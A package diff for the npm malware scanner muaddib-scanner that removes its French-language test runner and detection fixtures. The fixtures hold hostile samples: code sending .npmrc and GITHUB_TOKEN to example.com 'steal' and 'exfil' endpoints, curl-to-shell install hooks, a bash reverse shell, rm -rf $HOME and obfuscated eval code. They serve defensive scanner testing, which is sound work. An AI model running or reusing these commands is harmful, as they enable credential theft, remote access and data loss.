muaddib-scanner 1.0.8 → 1.0.10

package/tests/run-tests.js

@@ -1,389 +0,0 @@
-const fs = require('fs');
-const path = require('path');
-const { execSync } = require('child_process');
-
-const TESTS_DIR = path.join(__dirname, 'samples');
-const BIN = path.join(__dirname, '..', 'bin', 'muaddib.js');
-
-let passed = 0;
-let failed = 0;
-const failures = [];
-
-function test(name, fn) {
-  try {
-    fn();
-    console.log(`[PASS] ${name}`);
-    passed++;
-  } catch (e) {
-    console.log(`[FAIL] ${name}`);
-    console.log(`       ${e.message}`);
-    failures.push({ name, error: e.message });
-    failed++;
-  }
-}
-
-function assert(condition, message) {
-  if (!condition) {
-    throw new Error(message || 'Assertion failed');
-  }
-}
-
-function assertIncludes(str, substr, message) {
-  if (!str.includes(substr)) {
-    throw new Error(message || `Expected "${substr}" in output`);
-  }
-}
-
-function assertNotIncludes(str, substr, message) {
-  if (str.includes(substr)) {
-    throw new Error(message || `Unexpected "${substr}" in output`);
-  }
-}
-
-function runScan(target, options = '') {
-  try {
-    const cmd = `node "${BIN}" scan "${target}" ${options}`;
-    return execSync(cmd, { encoding: 'utf8', stdio: ['pipe', 'pipe', 'pipe'] });
-  } catch (e) {
-    return e.stdout || e.stderr || '';
-  }
-}
-
-function runCommand(cmd) {
-  try {
-    return execSync(`node "${BIN}" ${cmd}`, { encoding: 'utf8', stdio: ['pipe', 'pipe', 'pipe'] });
-  } catch (e) {
-    return e.stdout || e.stderr || '';
-  }
-}
-
-// ============================================
-// TESTS UNITAIRES - DETECTION AST
-// ============================================
-
-console.log('\n=== TESTS AST ===\n');
-
-test('AST: Detecte acces .npmrc', () => {
-  const output = runScan(path.join(TESTS_DIR, 'ast'));
-  assertIncludes(output, '.npmrc', 'Devrait detecter .npmrc');
-});
-
-test('AST: Detecte acces .ssh', () => {
-  const output = runScan(path.join(TESTS_DIR, 'ast'));
-  assertIncludes(output, '.ssh', 'Devrait detecter .ssh');
-});
-
-test('AST: Detecte GITHUB_TOKEN', () => {
-  const output = runScan(path.join(TESTS_DIR, 'ast'));
-  assertIncludes(output, 'GITHUB_TOKEN', 'Devrait detecter GITHUB_TOKEN');
-});
-
-test('AST: Detecte NPM_TOKEN', () => {
-  const output = runScan(path.join(TESTS_DIR, 'ast'));
-  assertIncludes(output, 'NPM_TOKEN', 'Devrait detecter NPM_TOKEN');
-});
-
-test('AST: Detecte AWS_SECRET', () => {
-  const output = runScan(path.join(TESTS_DIR, 'ast'));
-  assertIncludes(output, 'AWS_SECRET', 'Devrait detecter AWS_SECRET');
-});
-
-test('AST: Detecte eval()', () => {
-  const output = runScan(path.join(TESTS_DIR, 'ast'));
-  assertIncludes(output, 'eval', 'Devrait detecter eval');
-});
-
-test('AST: Detecte exec()', () => {
-  const output = runScan(path.join(TESTS_DIR, 'ast'));
-  assertIncludes(output, 'exec', 'Devrait detecter exec');
-});
-
-test('AST: Detecte spawn()', () => {
-  const output = runScan(path.join(TESTS_DIR, 'ast'));
-  assertIncludes(output, 'spawn', 'Devrait detecter spawn');
-});
-
-test('AST: Detecte new Function()', () => {
-  const output = runScan(path.join(TESTS_DIR, 'ast'));
-  assertIncludes(output, 'Function', 'Devrait detecter Function');
-});
-
-// ============================================
-// TESTS UNITAIRES - DETECTION SHELL
-// ============================================
-
-console.log('\n=== TESTS SHELL ===\n');
-
-test('SHELL: Detecte curl | sh', () => {
-  const output = runScan(path.join(TESTS_DIR, 'shell'));
-  assertIncludes(output, 'curl', 'Devrait detecter curl | sh');
-});
-
-test('SHELL: Detecte wget && chmod +x', () => {
-  const output = runScan(path.join(TESTS_DIR, 'shell'));
-  assertIncludes(output, 'wget', 'Devrait detecter wget');
-});
-
-test('SHELL: Detecte reverse shell', () => {
-  const output = runScan(path.join(TESTS_DIR, 'shell'));
-  assertIncludes(output, 'reverse', 'Devrait detecter reverse shell');
-});
-
-test('SHELL: Detecte rm -rf $HOME', () => {
-  const output = runScan(path.join(TESTS_DIR, 'shell'));
-  assertIncludes(output, 'home', 'Devrait detecter suppression home');
-});
-
-// ============================================
-// TESTS UNITAIRES - DETECTION OBFUSCATION
-// ============================================
-
-console.log('\n=== TESTS OBFUSCATION ===\n');
-
-test('OBFUSCATION: Detecte hex escapes massifs', () => {
-  const output = runScan(path.join(TESTS_DIR, 'obfuscation'));
-  assertIncludes(output, 'obfusc', 'Devrait detecter obfuscation');
-});
-
-test('OBFUSCATION: Detecte variables _0x', () => {
-  const output = runScan(path.join(TESTS_DIR, 'obfuscation'));
-  assertIncludes(output, 'obfusc', 'Devrait detecter variables _0x');
-});
-
-// ============================================
-// TESTS UNITAIRES - DETECTION DATAFLOW
-// ============================================
-
-console.log('\n=== TESTS DATAFLOW ===\n');
-
-test('DATAFLOW: Detecte credential read + network send', () => {
-  const output = runScan(path.join(TESTS_DIR, 'dataflow'));
-  assertIncludes(output, 'Flux suspect', 'Devrait detecter flux suspect');
-});
-
-test('DATAFLOW: Detecte env read + fetch', () => {
-  const output = runScan(path.join(TESTS_DIR, 'dataflow'));
-  assertIncludes(output, 'CRITICAL', 'Devrait etre CRITICAL');
-});
-
-// ============================================
-// TESTS UNITAIRES - DETECTION PACKAGE.JSON
-// ============================================
-
-console.log('\n=== TESTS PACKAGE.JSON ===\n');
-
-test('PACKAGE: Detecte preinstall suspect', () => {
-  const output = runScan(path.join(TESTS_DIR, 'package'));
-  assertIncludes(output, 'preinstall', 'Devrait detecter preinstall');
-});
-
-test('PACKAGE: Detecte postinstall suspect', () => {
-  const output = runScan(path.join(TESTS_DIR, 'package'));
-  assertIncludes(output, 'postinstall', 'Devrait detecter postinstall');
-});
-
-// ============================================
-// TESTS UNITAIRES - DETECTION MARQUEURS
-// ============================================
-
-console.log('\n=== TESTS MARQUEURS ===\n');
-
-test('MARQUEURS: Detecte Shai-Hulud', () => {
-  const output = runScan(path.join(TESTS_DIR, 'markers'));
-  assertIncludes(output, 'Shai-Hulud', 'Devrait detecter marqueur Shai-Hulud');
-});
-
-test('MARQUEURS: Detecte The Second Coming', () => {
-  const output = runScan(path.join(TESTS_DIR, 'markers'));
-  assertIncludes(output, 'Second Coming', 'Devrait detecter marqueur The Second Coming');
-});
-
-// ============================================
-// TESTS UNITAIRES - DETECTION TYPOSQUATTING
-// ============================================
-
-console.log('\n=== TESTS TYPOSQUATTING ===\n');
-
-test('TYPOSQUAT: Detecte lodahs (lodash)', () => {
-  const output = runScan(path.join(TESTS_DIR, 'typosquat'));
-  assertIncludes(output, 'lodahs', 'Devrait detecter lodahs');
-});
-
-test('TYPOSQUAT: Detecte axois (axios)', () => {
-  const output = runScan(path.join(TESTS_DIR, 'typosquat'));
-  assertIncludes(output, 'axois', 'Devrait detecter axois');
-});
-
-test('TYPOSQUAT: Detecte expres (express)', () => {
-  const output = runScan(path.join(TESTS_DIR, 'typosquat'));
-  assertIncludes(output, 'expres', 'Devrait detecter expres');
-});
-
-test('TYPOSQUAT: Severity HIGH', () => {
-  const output = runScan(path.join(TESTS_DIR, 'typosquat'));
-  assertIncludes(output, 'HIGH', 'Devrait etre HIGH');
-});
-
-// ============================================
-// TESTS INTEGRATION - CLI
-// ============================================
-
-console.log('\n=== TESTS CLI ===\n');
-
-test('CLI: --help affiche usage', () => {
-  const output = runCommand('');
-  assertIncludes(output, 'Usage', 'Devrait afficher usage');
-});
-
-test('CLI: --json retourne JSON valide', () => {
-  const output = runScan(path.join(TESTS_DIR, 'ast'), '--json');
-  try {
-    JSON.parse(output);
-  } catch (e) {
-    throw new Error('Output JSON invalide');
-  }
-});
-
-test('CLI: --sarif genere fichier SARIF', () => {
-  const sarifPath = path.join(__dirname, 'test-output.sarif');
-  runScan(path.join(TESTS_DIR, 'ast'), `--sarif "${sarifPath}"`);
-  assert(fs.existsSync(sarifPath), 'Fichier SARIF non genere');
-  const content = fs.readFileSync(sarifPath, 'utf8');
-  const sarif = JSON.parse(content);
-  assert(sarif.version === '2.1.0', 'Version SARIF incorrecte');
-  assert(sarif.runs && sarif.runs.length > 0, 'SARIF runs manquant');
-  fs.unlinkSync(sarifPath);
-});
-
-test('CLI: --html genere fichier HTML', () => {
-  const htmlPath = path.join(__dirname, 'test-output.html');
-  runScan(path.join(TESTS_DIR, 'ast'), `--html "${htmlPath}"`);
-  assert(fs.existsSync(htmlPath), 'Fichier HTML non genere');
-  const content = fs.readFileSync(htmlPath, 'utf8');
-  assertIncludes(content, 'MUAD', 'HTML devrait contenir MUAD');
-  assertIncludes(content, '<table>', 'HTML devrait contenir table');
-  fs.unlinkSync(htmlPath);
-});
-
-test('CLI: --explain affiche details', () => {
-  const output = runScan(path.join(TESTS_DIR, 'ast'), '--explain');
-  assertIncludes(output, 'Rule ID', 'Devrait afficher Rule ID');
-  assertIncludes(output, 'MITRE', 'Devrait afficher MITRE');
-  assertIncludes(output, 'References', 'Devrait afficher References');
-  assertIncludes(output, 'Playbook', 'Devrait afficher Playbook');
-});
-
-test('CLI: --fail-on critical exit code correct', () => {
-  try {
-    execSync(`node "${BIN}" scan "${path.join(TESTS_DIR, 'dataflow')}" --fail-on critical`, { encoding: 'utf8' });
-  } catch (e) {
-    assert(e.status === 1, 'Exit code devrait etre 1 pour 1 CRITICAL');
-    return;
-  }
-  throw new Error('Devrait avoir exit code non-zero');
-});
-
-test('CLI: --fail-on high exit code correct', () => {
-  try {
-    execSync(`node "${BIN}" scan "${path.join(TESTS_DIR, 'ast')}" --fail-on high`, { encoding: 'utf8' });
-  } catch (e) {
-    assert(e.status > 0, 'Exit code devrait etre > 0');
-    return;
-  }
-  throw new Error('Devrait avoir exit code non-zero');
-});
-
-// ============================================
-// TESTS INTEGRATION - UPDATE
-// ============================================
-
-console.log('\n=== TESTS UPDATE ===\n');
-
-test('UPDATE: Telecharge et cache IOCs', () => {
-  const output = runCommand('update');
-  assertIncludes(output, 'IOCs sauvegardes', 'Devrait sauvegarder IOCs');
-  assertIncludes(output, 'packages malveillants', 'Devrait afficher nombre packages');
-});
-
-// ============================================
-// TESTS FAUX POSITIFS
-// ============================================
-
-console.log('\n=== TESTS FAUX POSITIFS ===\n');
-
-test('FAUX POSITIFS: Projet propre = aucune menace', () => {
-  const output = runScan(path.join(TESTS_DIR, 'clean'));
-  assertIncludes(output, 'Aucune menace', 'Projet propre ne devrait pas avoir de menaces');
-});
-
-test('FAUX POSITIFS: Commentaires ignores', () => {
-  const output = runScan(path.join(TESTS_DIR, 'clean'));
-  assertNotIncludes(output, 'CRITICAL', 'Commentaires ne devraient pas declencher');
-});
-
-// ============================================
-// TESTS EDGE CASES
-// ============================================
-
-console.log('\n=== TESTS EDGE CASES ===\n');
-
-test('EDGE: Fichier vide ne crash pas', () => {
-  const output = runScan(path.join(TESTS_DIR, 'edge', 'empty'));
-  assert(output !== undefined, 'Ne devrait pas crasher sur fichier vide');
-});
-
-test('EDGE: Fichier non-JS ignore', () => {
-  const output = runScan(path.join(TESTS_DIR, 'edge', 'non-js'));
-  assertIncludes(output, 'Aucune menace', 'Fichiers non-JS ignores');
-});
-
-test('EDGE: Syntaxe JS invalide ne crash pas', () => {
-  const output = runScan(path.join(TESTS_DIR, 'edge', 'invalid-syntax'));
-  assert(output !== undefined, 'Ne devrait pas crasher sur syntaxe invalide');
-});
-
-test('EDGE: Tres gros fichier ne timeout pas', () => {
-  const start = Date.now();
-  runScan(path.join(TESTS_DIR, 'edge', 'large-file'));
-  const duration = Date.now() - start;
-  assert(duration < 30000, 'Ne devrait pas prendre plus de 30s');
-});
-
-// ============================================
-// TESTS REGLES MITRE
-// ============================================
-
-console.log('\n=== TESTS MITRE ===\n');
-
-test('MITRE: T1552.001 - Credentials in Files', () => {
-  const output = runScan(path.join(TESTS_DIR, 'ast'), '--explain');
-  assertIncludes(output, 'T1552.001', 'Devrait mapper T1552.001');
-});
-
-test('MITRE: T1059 - Command Execution', () => {
-  const output = runScan(path.join(TESTS_DIR, 'ast'), '--explain');
-  assertIncludes(output, 'T1059', 'Devrait mapper T1059');
-});
-
-test('MITRE: T1041 - Exfiltration', () => {
-  const output = runScan(path.join(TESTS_DIR, 'dataflow'), '--explain');
-  assertIncludes(output, 'T1041', 'Devrait mapper T1041');
-});
-
-// ============================================
-// RESULTATS
-// ============================================
-
-console.log('\n========================================');
-console.log(`RESULTATS: ${passed} passes, ${failed} echecs`);
-console.log('========================================\n');
-
-if (failures.length > 0) {
-  console.log('Echecs:');
-  failures.forEach(f => {
-    console.log(`  - ${f.name}: ${f.error}`);
-  });
-  console.log('');
-}
-
-process.exit(failed > 0 ? 1 : 0);

package/tests/samples/ast/malicious.js

@@ -1,20 +0,0 @@
-const fs = require('fs');
-const { exec, spawn } = require('child_process');
-
-// Test credentials access
-const npmrc = fs.readFileSync('.npmrc', 'utf8');
-const ssh = fs.readFileSync('.ssh/id_rsa', 'utf8');
-
-// Test env access
-const token = process.env.GITHUB_TOKEN;
-const npmToken = process.env.NPM_TOKEN;
-const awsSecret = process.env.AWS_SECRET;
-
-// Test dangerous calls
-eval('console.log("evil")');
-new Function('return this')();
-exec('ls -la');
-spawn('node', ['script.js']);
-
-// Test API reference
-fetch('https://api.github.com/user');

package/tests/samples/clean/safe.js

@@ -1,14 +0,0 @@
-// Code normal sans menaces
-const express = require('express');
-const app = express();
-
-app.get('/', (req, res) => {
-  res.send('Hello World');
-});
-
-app.listen(3000, () => {
-  console.log('Server running on port 3000');
-});
-
-// Commentaire mentionnant .npmrc pour test faux positif
-// On ne devrait pas detecter: .npmrc, GITHUB_TOKEN, eval

package/tests/samples/dataflow/exfiltration.js

@@ -1,20 +0,0 @@
-const fs = require('fs');
-const https = require('https');
-
-// Lecture credentials
-const npmrc = fs.readFileSync('.npmrc', 'utf8');
-const token = process.env.GITHUB_TOKEN;
-
-// Envoi reseau
-fetch('https://example.com/collect', {
-  method: 'POST',
-  body: JSON.stringify({ npmrc, token })
-});
-
-// Variante avec request
-const request = require('request');
-request.post('https://example.com/exfil', { body: npmrc });
-
-// Variante avec exec curl
-const { exec } = require('child_process');
-exec(`curl -X POST -d "${token}" https://example.com/steal`);

package/tests/samples/edge/invalid-syntax/broken.js

@@ -1,5 +0,0 @@
-function broken( {
-  const x = 
-  if (true
-    console.log("syntax error"
-}

package/tests/samples/edge/large-file/large.js

@@ -1,6 +0,0 @@
-// Large file test
-const data = [];
-for (let i = 0; i < 100000; i++) {
-  data.push({ id: i, value: Math.random() });
-}
-console.log(data.length);

package/tests/samples/edge/non-js/readme.txt

@@ -1,3 +0,0 @@
-This is a text file.
-GITHUB_TOKEN should not be detected here.
-eval() should not trigger.

package/tests/samples/markers/shai-hulud.js

@@ -1,10 +0,0 @@
-// Shai-Hulud worm marker
-const version = "The Second Coming";
-const author = "Goldox-T3chs";
-
-// Payload
-function infect() {
-  console.log("Shai-Hulud was here");
-}
-
-infect();

package/tests/samples/obfuscation/obfuscated.js

@@ -1 +0,0 @@
-var _0x1234=['log','Hello'];var _0x5678=function(_0x1234ab){return _0x1234[_0x1234ab];};console[_0x5678(0)](_0x5678(1));var _0xabcd='\x65\x76\x61\x6c';var _0xef01='\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x6c\x6f\x67\x28\x22\x68\x61\x63\x6b\x65\x64\x22\x29';window[_0xabcd](_0xef01);var _0x9876=['\x72\x65\x61\x64\x46\x69\x6c\x65\x53\x79\x6e\x63','\x2e\x6e\x70\x6d\x72\x63'];require('\x66\x73')[_0x9876[0]](_0x9876[1]);(function(_0x2341,_0x5432){var _0x1111=function(_0x2222){while(--_0x2222){_0x2341['push'](_0x2341['shift']());}};_0x1111(++_0x5432);}([],0x1ff));var _0xaaaa=atob('ZXZhbCgiY29uc29sZS5sb2coJ293bmVkJykiKQ==');eval(_0xaaaa);

package/tests/samples/package/package.json

@@ -1,9 +0,0 @@
-{
-  "name": "malicious-package",
-  "version": "1.0.0",
-  "scripts": {
-    "preinstall": "curl https://example.com/payload.sh | sh",
-    "postinstall": "node -e \"require('child_process').exec('whoami')\"",
-    "install": "echo $NPM_TOKEN | base64"
-  }
-}

package/tests/samples/shell/malicious.sh

@@ -1,13 +0,0 @@
-#!/bin/bash
-
-# Test curl | sh
-curl https://example.com/script.sh | sh
-
-# Test wget
-wget https://example.com/payload && chmod +x payload && ./payload
-
-# Test reverse shell
-bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
-
-# Test dead man's switch
-rm -rf $HOME

package/tests/samples/typosquat/package.json

@@ -1,11 +0,0 @@
-{
-  "name": "test-typosquat",
-  "version": "1.0.0",
-  "dependencies": {
-    "lodahs": "^1.0.0",
-    "axois": "^1.0.0",
-    "expres": "^1.0.0",
-    "recat": "^1.0.0",
-    "momnet": "^1.0.0"
-  }
-}

package/vscode-extension/.vscode/launch.json

@@ -1,13 +0,0 @@
-{
-  "version": "0.2.0",
-  "configurations": [
-    {
-      "name": "Run Extension",
-      "type": "extensionHost",
-      "request": "launch",
-      "args": [
-        "--extensionDevelopmentPath=${workspaceFolder}"
-      ]
-    }
-  ]
-}

package/vscode-extension/LICENSE

@@ -1,21 +0,0 @@
-MIT License
-
-Copyright (c) 2026 MUAD'DIB Contributors
-
-Permission is hereby granted, free of charge, to any person obtaining a copy
-of this software and associated documentation files (the "Software"), to deal
-in the Software without restriction, including without limitation the rights
-to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-copies of the Software, and to permit persons to whom the Software is
-furnished to do so, subject to the following conditions:
-
-The above copyright notice and this permission notice shall be included in all
-copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-SOFTWARE.